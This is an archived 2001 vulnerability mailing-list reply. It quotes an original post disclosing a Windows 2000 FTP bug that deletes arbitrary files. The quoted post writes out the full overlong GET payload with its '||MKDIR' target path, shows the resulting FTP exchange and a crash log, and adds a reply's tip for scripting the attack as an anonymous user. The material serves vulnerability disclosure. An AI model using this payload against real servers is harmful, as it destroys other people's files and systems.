Vulnerability Development mailing list archives
Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system.
From: Stephen <spjohn () MAIL UTEXAS EDU>
Date: Fri, 16 Feb 2001 00:52:25 -0800
Tried this on Win2k Server Build 2195. I was able to overwrite a file when logged on as anonymous, and the file permissions on the file were set to no access by anyone. But it should be noted that I logged in from the local system, alothough I doubt a remote login would change anything. Anyone tring to get this this to work using Windows might want to try running 'ftp -A -s:comfile X.X.X.X' , this logs in as anonymous and runs the commands in the file 'comfile' where comfile has the get command in it (with no newlines). Stephen John ----- Original Message ----- From: Antti Hakulinen To: VULN-DEV () SECURITYFOCUS COM Sent: Thursday, February 15, 2001 2:53 PM Subject: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. This little " ms feature" allows anyfile on your system to be deleted. This applies at least Win2k build 2195 servicepack 1 & latest updates. Using the GET command like this. _________________________________________________________________________________________________________ C:\FTP <target machine> blaah blaah.... (BTW: This "feature" Works fine as anonymous user) _________________________________________________________________________________________________________ ftp> get \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR c: \downloads\mp3\1.mp3 ---> PORT 212,246,182,42,5,52 200 PORT command successful. ---> RETR \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR 500 Command was too long ____________________________________________________________________________________________________________ So, any file what you named in ||MKDIR part is deleted. Well atleast it is gone ;) Malicious users can now delete files, assuming he/she knows where it is being located. It will be hell easy to put an end to any machine/server that is using ms ftp. Just by deleting all the vital system files. If the file doesn't exist, 1 will be created, but length is always 0. (So no luck with writing a file yet heh) OHH! Don't get fooled when you do this umm... for example to your config.sys file. There will be an error message: PERMISSION DENIED : but who cares, this fabulous ms feature deletes it anyway. -huh- Here is the DRWTSN32.LOG file from my system. -NOTE- The "get" command line was little different in letters when i tested this "feature" :) , but it was equal in lenght. Application exception occurred: App: ftp.exe (pid=824) When: 2/16/2001 @ 00:04:23.868 Exception number: c0000005 (access violation) *----> System Information <----* Computer Name: DIVINE User Name: Administrator Number of Processors: 1 Processor Type: x86 Family 6 Model 3 Stepping 0 Windows 2000 Version: 5.0 Current Build: 2195 Service Pack: None Current Type: Uniprocessor Free Registered Organization: xxxxxxxxxxxxxxxx Registered Owner: xxxxxxxxxxxxxxxx *----> Task List <----* 0 Idle.exe 8 System.exe 140 smss.exe 164 csrss.exe 160 winlogon.exe 212 services.exe 224 lsass.exe 384 svchost.exe 412 SPOOLSV.exe 444 svchost.exe 484 regsvc.exe 500 mstask.exe 556 tcpsvcs.exe 568 snmp.exe 616 winmgmt.exe 648 inetinfo.exe 1080 explorer.exe 1212 internat.exe 628 msimn.exe 828 SETI () home exe 892 cmd.exe 1280 mdm.exe 824 ftp.exe 1240 drwtsn32.exe 0 _Total.exe (01000000 - 0100F000) (77F80000 - 77FF9000) (75050000 - 75058000) (77E80000 - 77F36000) (75030000 - 75044000) (78000000 - 78046000) (77DB0000 - 77E0A000) (77D40000 - 77DAF000) (75020000 - 75028000) (74FF0000 - 75002000) (77E10000 - 77E75000) (77F40000 - 77F7C000) (77980000 - 779A4000) (77840000 - 7784C000) (777E0000 - 777E8000) (77950000 - 77979000) (777F0000 - 777F5000) (77830000 - 7783E000) (74FD0000 - 74FE1000) (75010000 - 75017000) State Dump for Thread Id 0x324 eax=0006ffb0 ebx=00000000 ecx=00000000 edx=010077c0 esi=00737973 edi=00000001 eip=780121b2 esp=0006f758 ebp=0006f780 iopl=0 nv up ei ng nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000286 function: fclose 78012192 686af50078 push 0x7800f56a 78012197 64a100000000 mov eax,fs:[00000000] fs:00000000=???????? 7801219d 50 push eax 7801219e 64892500000000 mov fs:[00000000],esp fs:00000000=???????? 780121a5 83ec0c sub esp,0xc 780121a8 53 push ebx 780121a9 56 push esi 780121aa 57 push edi 780121ab 834de4ff or dword ptr [ebp+0xe4],0xff ss:00b3cd56=???????? 780121af 8b7508 mov esi,[ebp+0x8] ss:00b3cd56=???????? FAULT ->780121b2 f6460c40 test byte ptr [esi+0xc],0x40 ds:01204f49=?? 780121b6 7416 jz wexecve+0x14f (7801a4ce) 780121b8 83660c00 and dword ptr [esi+0xc],0x0 ds:01204f49=???????? 780121bc 8b45e4 mov eax,[ebp+0xe4] ss:00b3cd56=???????? 780121bf 8b4df0 mov ecx,[ebp+0xf0] ss:00b3cd56=???????? 780121c2 64890d00000000 mov fs:[00000000],ecx fs:00000000=???????? 780121c9 5f pop edi 780121ca 5e pop esi 780121cb 5b pop ebx 780121cc c9 leave 780121cd c3 ret 780121ce 56 push esi *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0006F780 01001E67 00737973 00000000 010018D3 77E9B3C1 !fclose 0006FF70 010054EF 00000001 00283724 00282980 77E9B3C1 ftp!<nosymbols> 0006FFC0 77E87903 77E9B3C1 0012F88F 7FFDF000 C0000005 ftp!<nosymbols> 0006FFF0 00000000 010053F0 00000000 000000C8 00000100 kernel32!SetUnhandledExceptionFilter *----> Raw Stack Dump <----* 0006f758 01 00 00 00 00 00 00 00 - 00 00 00 00 ff ff ff ff ................ 0006f768 c0 77 00 01 a4 f3 06 00 - b0 ff 06 00 6a f5 00 78 .w..........j..x 0006f778 d0 4a 03 78 ff ff ff ff - 70 ff 06 00 67 1e 00 01 .J.x....p...g... 0006f788 73 79 73 00 00 00 00 00 - d3 18 00 01 c1 b3 e9 77 sys............w 0006f798 8f f8 12 00 00 f0 fd 7f - 43 3a 5c 00 ff ff ff ff ........C:\..... 0006f7a8 20 f8 06 00 8f 85 f8 77 - 00 00 00 01 85 71 e8 77 ......w.....q.w 0006f7b8 a1 71 e8 77 bd 5b f9 77 - a0 f8 06 00 00 00 00 00 .q.w.[.w........ 0006f7c8 00 e0 fd 7f 00 f8 06 00 - 06 00 00 00 e4 f7 06 00 ................ 0006f7d8 00 00 00 00 6e b5 f8 77 - 27 38 f9 77 00 00 04 00 ....n..w'8.w.... 0006f7e8 d0 00 00 01 37 00 00 00 - 00 00 00 00 45 f0 fd 7f ....7.......E... 0006f7f8 00 00 00 00 00 f0 fd 7f - 00 02 00 00 20 00 00 00 ............ ... 0006f808 06 00 00 00 06 00 00 00 - cc f8 06 00 fd 13 ea 77 ...............w 0006f818 c0 71 e8 77 ff ff ff ff - 70 f8 06 00 8c 7c e8 77 .q.w....p....|.w 0006f828 00 00 00 00 5c f8 06 00 - 00 00 00 00 98 98 f8 77 ....\..........w 0006f838 00 00 07 00 30 2f 07 00 - 00 00 00 00 38 f8 06 00 ....0/......8... 0006f848 88 06 07 00 ec f8 06 00 - db 80 fb 77 d0 98 f8 77 ...........w...w 0006f858 ff ff ff ff fc f8 06 00 - ec 9c fc 77 a8 07 07 00 ...........w.... 0006f868 38 2f 07 00 2c 12 ff 74 - c8 2c 07 00 00 00 00 00 8/..,..t.,...... 0006f878 01 00 00 00 2c 12 ff 74 - f0 f8 06 00 00 00 00 00 ....,..t........ 0006f888 9c f8 06 00 3a 6a f8 77 - 00 00 00 00 70 f9 99 77 ....:j.w....p..w State Dump for Thread Id 0x4a8 eax=778321fe ebx=00000003 ecx=7ffde000 edx=00000000 esi=77f87e6c edi=00000003 eip=77f87e77 esp=0072fd24 ebp=0072fd70 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: ZwWaitForMultipleObjects 77f87e6c b8e9000000 mov eax,0xe9 77f87e71 8d542404 lea edx,[esp+0x4] ss:011fd2fb=???????? 77f87e75 cd2e int 2e 77f87e77 c21400 ret 0x14 77f87e7a 668b08 mov cx,[eax] ds:778321fe=8b55 77f87e7d 40 inc eax 77f87e7e 40 inc eax 77f87e7f 8945a4 mov [ebp+0xa4],eax ss:011fd346=???????? 77f87e82 6685c9 test cx,cx 77f87e85 75f3 jnz RtlExpandEnvironmentStrings_U+0x26 (77f8e57a) 77f87e87 663930 cmp [eax],si ds:778321fe=8b55 77f87e8a 75ee jnz ZwFsControlFile+0x54 (77f8bf7a) 77f87e8c 40 inc eax 77f87e8d 40 inc eax 77f87e8e 8945a4 mov [ebp+0xa4],eax ss:011fd346=???????? *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0072FD70 77E9E68A 0072FD48 00000001 00000000 00000000 ntdll!ZwWaitForMultipleObjects 0072FFB4 77E92CA8 00000004 0007BCDC 7FFDE000 0007C6E8 kernel32!WaitForMultipleObjects 0072FFEC 00000000 00000000 00000000 00000000 00000000 kernel32!CreateFileA ___________________________________________________________________________________________________________ Workarounds: Too tired to search 1 right now. Noticed that RETR??? Whats that anyway, so maybe disabling commands. Otherwise, better not to be using w2k as FTP server. P.S: If you can reproduce this, please let me know. ... if you can't let me know also. :) I'll end my days if this was known bug, and i haven't just updated my system (which is 2-3 days ago) :) Anyway, if this is known bug. Let me know please. Regards: Antti Hakulinen _____________________________________________________________________________________________________________ Antti Hakulinen Antti.Hakulinen () fi flextronics com IT Assistant Flextronics Design Finland
Current thread:
- WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Antti Hakulinen (Feb 15)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Stephen (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to bedeleted from the remote system. Kevin van der Raad (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. 3APA3A (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Antti Hakulinen (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted Robert A. Seace (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Stephen (Feb 16)